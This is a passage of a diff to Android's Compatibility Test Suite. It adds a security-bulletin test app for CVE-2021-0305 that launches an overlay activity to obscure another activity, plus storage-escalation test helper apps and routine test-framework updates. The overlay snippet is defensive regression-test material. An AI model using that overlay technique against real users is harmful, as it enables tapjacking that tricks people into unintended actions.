+ //open OverlayActivity to obstruct MainActivity
+ Intent intent = new Intent(this, OverlayActivity.class);
+ intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION);
+ startActivity(intent);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
new file mode 100644
index 0000000..c320e5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
@@ -0,0 +1,4 @@
+package android.security.cts.CVE_2021_0305;
+import android.app.Activity;
+
+public class OverlayActivity extends Activity {}
diff --git a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java
index e78e5f3..4186ba1 100644
--- a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java
+++ b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java
@@ -26,10 +26,12 @@
final class PackageInstallerSessionInfoSubject extends
Subject<PackageInstallerSessionInfoSubject, PackageInstaller.SessionInfo> {
+ private final PackageInstaller.SessionInfo mActual;
private PackageInstallerSessionInfoSubject(FailureMetadata failureMetadata,
@Nullable PackageInstaller.SessionInfo subject) {
super(failureMetadata, subject);
+ mActual = subject;
}
private static Subject.Factory<PackageInstallerSessionInfoSubject,
@@ -50,18 +52,15 @@
}
public void isStagedSessionReady() {
- check().withMessage(failureMessage("in state READY")).that(
- getSubject().isStagedSessionReady()).isTrue();
+ check(failureMessage("in state READY")).that(mActual.isStagedSessionReady()).isTrue();
}
public void isStagedSessionApplied() {
- check().withMessage(failureMessage("in state APPLIED")).that(
- getSubject().isStagedSessionApplied()).isTrue();
+ check(failureMessage("in state APPLIED")).that(mActual.isStagedSessionApplied()).isTrue();
}
public void isStagedSessionFailed() {
- check().withMessage(failureMessage("in state FAILED")).that(
- getSubject().isStagedSessionFailed()).isTrue();
+ check(failureMessage("in state FAILED")).that(mActual.isStagedSessionFailed()).isTrue();
}
private String failureMessage(String suffix) {
@@ -69,12 +68,11 @@
}
private String subjectAsString() {
- PackageInstaller.SessionInfo session = getSubject();
- return "{" + "appPackageName = " + session.getAppPackageName() + "; "
- + "sessionId = " + session.getSessionId() + "; "
- + "isStagedSessionReady = " + session.isStagedSessionReady() + "; "
- + "isStagedSessionApplied = " + session.isStagedSessionApplied() + "; "
- + "isStagedSessionFailed = " + session.isStagedSessionFailed() + "; "
- + "stagedSessionErrorMessage = " + session.getStagedSessionErrorMessage() + "}";
+ return "{" + "appPackageName = " + mActual.getAppPackageName() + "; "
+ + "sessionId = " + mActual.getSessionId() + "; "
+ + "isStagedSessionReady = " + mActual.isStagedSessionReady() + "; "
+ + "isStagedSessionApplied = " + mActual.isStagedSessionApplied() + "; "
+ + "isStagedSessionFailed = " + mActual.isStagedSessionFailed() + "; "
+ + "stagedSessionErrorMessage = " + mActual.getStagedSessionErrorMessage() + "}";
}
}
diff --git a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java
index 684f0ec..9f912e0 100644
--- a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java
+++ b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java
@@ -33,6 +33,8 @@
* Subject for asserting things about RollbackInfo instances.
*/
public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, RollbackInfo> {
+ private final RollbackInfo mActual;
+
/**
* Asserts something about RollbackInfo.
*/
@@ -57,27 +59,28 @@
private RollbackInfoSubject(FailureMetadata failureMetadata, RollbackInfo subject) {
super(failureMetadata, subject);
+ mActual = subject;
}
/**
* Asserts that the RollbackInfo has given rollbackId.
*/
public void hasRollbackId(int rollbackId) {
- check().that(getSubject().getRollbackId()).isEqualTo(rollbackId);
+ check("getRollbackId()").that(mActual.getRollbackId()).isEqualTo(rollbackId);
}
/**
* Asserts that the RollbackInfo is for a staged rollback.
*/
public void isStaged() {
- check().that(getSubject().isStaged()).isTrue();
+ check("isStaged()").that(mActual.isStaged()).isTrue();
}
/**
* Asserts that the RollbackInfo is not for a staged rollback.
*/
public void isNotStaged() {
- check().that(getSubject().isStaged()).isFalse();
+ check("isStaged()").that(mActual.isStaged()).isFalse();
}
/**
@@ -86,10 +89,10 @@
*/
public void packagesContainsExactly(Rollback... expected) {
List<Rollback> actualPackages = new ArrayList<>();
- for (PackageRollbackInfo info : getSubject().getPackages()) {
+ for (PackageRollbackInfo info : mActual.getPackages()) {
actualPackages.add(new Rollback(info));
}
- check().that(actualPackages).containsExactly((Object[]) expected);
+ check("actualPackages").that(actualPackages).containsExactly((Object[]) expected);
}
/**
@@ -102,6 +105,7 @@
expectedVps.add(cause.getVersionedPackage());
}
- check().that(getSubject().getCausePackages()).containsExactlyElementsIn(expectedVps);
+ check("getCausePackages()").that(mActual.getCausePackages())
+ .containsExactlyElementsIn(expectedVps);
}
}
diff --git a/tests/AlarmManager/Android.bp b/tests/AlarmManager/Android.bp
index 204f5a3..14180bc 100644
--- a/tests/AlarmManager/Android.bp
+++ b/tests/AlarmManager/Android.bp
@@ -28,6 +28,7 @@
"cts",
"vts10",
"general-tests",
+ "mts-scheduling",
],
platform_apis: true,
}
diff --git a/tests/backup/Android.bp b/tests/backup/Android.bp
index e1fcf7f..e5fc8bb 100644
--- a/tests/backup/Android.bp
+++ b/tests/backup/Android.bp
@@ -35,7 +35,7 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-permission",
],
sdk_version: "test_current",
}
diff --git a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java
index 9caf365..b093e6c 100644
--- a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java
+++ b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java
@@ -127,7 +127,7 @@
if (hasAccess) {
fail("Unexpected exception" + e);
} else {
- assertThat(e.getReason()).isSameAs(CameraAccessException.CAMERA_DISABLED);
+ assertThat(e.getReason()).isSameInstanceAs(CameraAccessException.CAMERA_DISABLED);
}
}
diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java
index 0c9fd40..94c9234 100644
--- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java
+++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java
@@ -47,7 +47,7 @@
final ContentCaptureCondition condition =
new ContentCaptureCondition(mLocusId, FLAG_IS_REGEX);
assertThat(condition).isNotNull();
- assertThat(condition.getLocusId()).isSameAs(mLocusId);
- assertThat(condition.getFlags()).isSameAs(FLAG_IS_REGEX);
+ assertThat(condition.getLocusId()).isSameInstanceAs(mLocusId);
+ assertThat(condition.getFlags()).isSameInstanceAs(FLAG_IS_REGEX);
}
}
diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java
index 47bd20b..59c61c7 100644
--- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java
+++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java
@@ -89,7 +89,7 @@
@Test
public void testSetGetBundle() {
final Builder builder = mBuilder.setExtras(mExtras);
- assertThat(builder).isSameAs(mBuilder);
+ assertThat(builder).isSameInstanceAs(mBuilder);
final ContentCaptureContext context = builder.build();
assertThat(context).isNotNull();
assertExtras(context.getExtras());
@@ -99,7 +99,7 @@
public void testParcel() {
final Builder builder = mBuilder
.setExtras(mExtras);
- assertThat(builder).isSameAs(mBuilder);
+ assertThat(builder).isSameInstanceAs(mBuilder);
final ContentCaptureContext context = builder.build();
assertEverything(context);
diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml
index e17658a..fd55b69 100755
--- a/tests/framework/base/windowmanager/app/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml
@@ -172,6 +172,15 @@
android:minHeight="80dp"
/>
</activity>
+ <activity android:name=".PipActivityWithTinyMinimalSize"
+ android:resizeableActivity="false"
+ android:supportsPictureInPicture="true"
+ android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout"
+ android:exported="true"
+ android:taskAffinity="nobody.but.PipActivity">
+ <layout android:minWidth="1dp"
+ android:minHeight="1dp"/>
+ </activity>
<activity android:name=".FreeformActivity"
android:resizeableActivity="true"
android:taskAffinity="nobody.but.FreeformActivity"
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
index d3b5621..dc5aca6 100644
--- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
@@ -79,6 +79,8 @@
public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2");
public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component(
"PipActivityWithMinimalSize");
+ public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component(
+ "PipActivityWithTinyMinimalSize");
public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY =
component("PipActivityWithSameAffinity");
public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity");
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
new file mode 100644
index 0000000..cd1c625
--- /dev/null
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.server.wm.app;
+
+/**
+ * An activity that has the same behavior as {@link PipActivity} and specifies
+ * minimal dimension in its manifest which is tiny and smaller than the allowed minimum.
+ */
+public class PipActivityWithTinyMinimalSize extends PipActivity {
+}
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
index 3ac15bb..98e5ff5 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
@@ -29,6 +29,7 @@
import static android.server.wm.WindowManagerState.STATE_PAUSED;
import static android.server.wm.WindowManagerState.STATE_RESUMED;
import static android.server.wm.WindowManagerState.STATE_STOPPED;
+import static android.server.wm.WindowManagerState.dpToPx;
import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY;
import static android.server.wm.app.Components.LAUNCHING_ACTIVITY;
import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY;
@@ -38,6 +39,7 @@
import static android.server.wm.app.Components.PIP_ACTIVITY2;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY;
+import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY;
import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP;
import static android.server.wm.app.Components.PipActivity.ACTION_FINISH;
@@ -144,6 +146,8 @@
private static final int MAX_ASPECT_RATIO_NUMERATOR = 239;
private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100;
private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1;
+ // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task
+ private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48;
@Before
@Override
@@ -250,8 +254,6 @@
assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY);
}
- // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight
- // is respected after b/149338177.
@Test
public void testEnterPipWithMinimalSize() throws Exception {
// Launch a PiP activity with minimal size specified
@@ -276,6 +278,29 @@
}
@Test
+ public void testEnterPipWithTinyMinimalSize() throws Exception {
+ // Launch a PiP activity with minimal size specified and smaller than allowed minimum
+ launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true");
+ // Wait for animation complete since we are comparing size
+ waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ assertPinnedStackExists();
+
+ final WindowManagerState.WindowState windowState = getWindowState(
+ PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ final WindowManagerState.DisplayContent display = mWmState.getDisplay(
+ windowState.getDisplayId());
+ final int overridableMinSize = dpToPx(
+ OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi());
+
+ // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions
+ final Rect pipBounds = getPinnedStackBounds();
+ assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal "
+ + overridableMinSize + " on both dimensions",
+ pipBounds.width() >= overridableMinSize
+ && pipBounds.height() >= overridableMinSize);
+ }
+
+ @Test
public void testEnterPipAspectRatioMin() throws Exception {
testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR);
}
diff --git a/tests/libcore/okhttp/Android.bp b/tests/libcore/okhttp/Android.bp
index b0f17d2..b091083 100644
--- a/tests/libcore/okhttp/Android.bp
+++ b/tests/libcore/okhttp/Android.bp
@@ -36,7 +36,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-conscrypt",
"vts10",
],
java_resources: [":libcore-expectations-knownfailures"],
diff --git a/tests/libcore/okhttp/AndroidTest.xml b/tests/libcore/okhttp/AndroidTest.xml
index 771293e2..0907b0a 100644
--- a/tests/libcore/okhttp/AndroidTest.xml
+++ b/tests/libcore/okhttp/AndroidTest.xml
@@ -45,4 +45,8 @@
<object type="module_controller" class="com.android.tradefed.testtype.suite.module.TestFailureModuleController">
<option name="screenshot-on-failure" value="false" />
</object>
+
+ <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController">
+ <option name="mainline-module-package-name" value="com.google.android.conscrypt" />
+ </object>
</configuration>
diff --git a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
index 974d02a..790880b 100644
--- a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
@@ -933,6 +933,11 @@
if (samplingPeriodUs < s.getMinDelay()) {
return;
}
+
+ if (samplingPeriodUs > s.getMaxDelay()) {
+ samplingPeriodUs = s.getMaxDelay();
+ }
+
resetEvent();
mChannel = prepareDirectChannel(memType, false /* secondary */);
diff --git a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java
index b3785d8..3a035f6 100644
--- a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java
+++ b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java
@@ -669,7 +669,7 @@
// Check required permissions
List<String> requestedPermissions = Arrays.asList(pkgInfo.requestedPermissions);
- assertThat(requestedPermissions).containsAllOf(
+ assertThat(requestedPermissions).containsAtLeast(
"android.permission.MANAGE_ACCOUNTS",
"android.permission.ACCESS_NETWORK_STATE",
"android.content.cts.permission.TEST_GRANTED");
diff --git a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java
index 6998103..e4ec383 100644
--- a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java
+++ b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java
@@ -102,7 +102,7 @@
// We don't do an exact match because the framework can add asset files and this test
// would be too brittle.
- assertThat(files).asList().containsAllOf(fileName, "subdir");
+ assertThat(files).asList().containsAtLeast(fileName, "subdir");
files = mAssets.list("subdir");
assertThat(files).isNotNull();
diff --git a/tests/tests/media/Android.bp b/tests/tests/media/Android.bp
index 848f004..6b1797d 100644
--- a/tests/tests/media/Android.bp
+++ b/tests/tests/media/Android.bp
@@ -77,7 +77,7 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-media",
],
host_required: ["cts-dynamic-config"],
min_sdk_version: "29",
diff --git a/tests/tests/mediaparser/Android.bp b/tests/tests/mediaparser/Android.bp
index 13859a77..d9756e8 100644
--- a/tests/tests/mediaparser/Android.bp
+++ b/tests/tests/mediaparser/Android.bp
@@ -19,7 +19,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-media",
],
}
diff --git a/tests/tests/mediastress/Android.bp b/tests/tests/mediastress/Android.bp
index 689fec0..8060b9f 100644
--- a/tests/tests/mediastress/Android.bp
+++ b/tests/tests/mediastress/Android.bp
@@ -20,7 +20,7 @@
"cts",
"vts10",
"general-tests",
- "mts",
+ "mts-media",
],
// Include both the 32 and 64 bit versions
compile_multilib: "both",
diff --git a/tests/tests/neuralnetworks/Android.mk b/tests/tests/neuralnetworks/Android.mk
index 9928e08..3180aab 100644
--- a/tests/tests/neuralnetworks/Android.mk
+++ b/tests/tests/neuralnetworks/Android.mk
@@ -32,7 +32,7 @@
LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests
+LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests
LOCAL_SDK_VERSION := current
LOCAL_NDK_STL_VARIANT := c++_static
diff --git a/tests/tests/neuralnetworks/benchmark/Android.mk b/tests/tests/neuralnetworks/benchmark/Android.mk
index 9df9c98..2207258 100644
--- a/tests/tests/neuralnetworks/benchmark/Android.mk
+++ b/tests/tests/neuralnetworks/benchmark/Android.mk
@@ -27,7 +27,7 @@
LOCAL_MULTILIB := both
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts10 mts
+LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks
LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.rules \
compatibility-device-util-axt ctstestrunner-axt junit NeuralNetworksApiBenchmark_Lib
diff --git a/tests/tests/neuralnetworks/tflite_delegate/Android.mk b/tests/tests/neuralnetworks/tflite_delegate/Android.mk
index 091a070..1bcb0f4 100644
--- a/tests/tests/neuralnetworks/tflite_delegate/Android.mk
+++ b/tests/tests/neuralnetworks/tflite_delegate/Android.mk
@@ -66,7 +66,7 @@
LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests
+LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests
LOCAL_SDK_VERSION := current
LOCAL_NDK_STL_VARIANT := c++_static
diff --git a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
index aabff61..8929c43 100644
--- a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
+++ b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
@@ -31,7 +31,7 @@
"cts",
"vts10",
"general-tests",
- "mts"
+ "mts-extservices"
],
sdk_version: "test_current",
target_sdk_version: "29",
diff --git a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java
index 99ea30c..c1172ff 100644
--- a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java
+++ b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java
@@ -314,7 +314,7 @@
}
String[] newChildDir = mCratesRoot.toFile().list();
- assertThat(newChildDir).asList().containsAllIn(expectedCrates);
+ assertThat(newChildDir).asList().containsAtLeastElementsIn(expectedCrates);
}
@Test
diff --git a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java
index 60ede8b..226bb7a 100644
--- a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java
+++ b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java
@@ -380,17 +380,10 @@
assertThat(newCollection.size()).isEqualTo(oldCollection.size() - 1);
}
- Correspondence<CrateInfo, String> mCorrespondenceByLabel = new Correspondence<>() {
- @Override
- public boolean compare(CrateInfo crateInfo, String expect) {
+ Correspondence<CrateInfo, String> mCorrespondenceByLabel =
+ Correspondence.from((CrateInfo crateInfo, String expect) -> {
return TextUtils.equals(crateInfo.getLabel(), expect);
- }
-
- @Override
- public String toString() {
- return "It should be the crated folder name";
- }
- };
+ }, "It should be the crated folder name");
@Test
public void queryCratesForUid_createDeepPath_shouldCreateOneCrate()
diff --git a/tests/tests/packagewatchdog/Android.bp b/tests/tests/packagewatchdog/Android.bp
index 8773e4a..678bda6 100644
--- a/tests/tests/packagewatchdog/Android.bp
+++ b/tests/tests/packagewatchdog/Android.bp
@@ -23,7 +23,7 @@
"vts",
"vts10",
"general-tests",
- "mts"
+ "mts-extservices"
],
libs: ["android.test.base.stubs"],
static_libs: [
diff --git a/tests/tests/permission/Android.bp b/tests/tests/permission/Android.bp
index c8459cf..607c7a1 100644
--- a/tests/tests/permission/Android.bp
+++ b/tests/tests/permission/Android.bp
@@ -22,7 +22,7 @@
"vts10",
"general-tests",
"sts",
- "mts",
+ "mts-permission",
],
// Include both the 32 and 64 bit versions
compile_multilib: "both",
diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml
index 5277c9a..66b6560 100644
--- a/tests/tests/permission/AndroidTest.xml
+++ b/tests/tests/permission/AndroidTest.xml
@@ -65,6 +65,9 @@
<option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" />
<option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" />
<option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" />
+ <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" />
</target_preparer>
<!-- Remove additional apps if installed -->
diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp
new file mode 100644
index 0000000..a038879
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/Android.bp
@@ -0,0 +1,24 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp28",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
new file mode 100644
index 0000000..f1bd315
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" />
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
new file mode 100644
index 0000000..c53676f
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
@@ -0,0 +1,24 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Full",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
new file mode 100644
index 0000000..73a7110
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="true"/>
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
new file mode 100644
index 0000000..9fde8b8
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
@@ -0,0 +1,24 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Scoped",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
new file mode 100644
index 0000000..c3812fe
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
